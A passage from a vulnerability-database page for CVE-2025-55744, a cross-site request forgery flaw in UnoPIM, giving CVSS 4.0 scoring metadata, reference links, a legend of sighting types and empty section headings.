          "attackComplexity": "LOW",
          "attackRequirements": "PRESENT",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 6.9,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "PROOF_OF_CONCEPT",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-08-21T16:15:34.640",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit"
      ],
      "url": "https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/unopim/unopim/security/advisories/GHSA-287x-6r2h-f9mw"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-352"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-55744 (GCVE-0-2025-55744)

GHSA-287X-6R2H-F9MW

Summary

Details

PoC

Impact

Remediation:

FKIE_CVE-2025-55744

Tags

Sightings

Nomenclature